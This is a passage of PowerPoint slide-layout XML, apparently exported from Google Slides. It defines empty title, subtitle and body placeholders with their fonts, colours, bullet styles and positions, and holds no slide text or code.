                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Google Shape;75;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Google Shape;76;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="27544"/>
            <a:ext cx="6457200" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="77" name="Google Shape;77;p8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="758040"/>
            <a:ext cx="8511900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="21425">
            <a:solidFill>
              <a:srgbClr val="0072CE"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Google Shape;78;p8"/>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Red Background_Blank 1">
  <p:cSld name="TITLE_ONLY_1_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="000D74"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="79" name="Shape 79"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Google Shape;80;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Google Shape;81;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;82;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="714900"/>
            <a:ext cx="3398700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="B9D8EB"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Inter"/>
              <a:buNone/>
              <a:defRPr b="1" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="B9D8EB"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;83;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="1518375"/>
            <a:ext cx="7914300" cy="2676300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="—"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="3200400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="3657600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
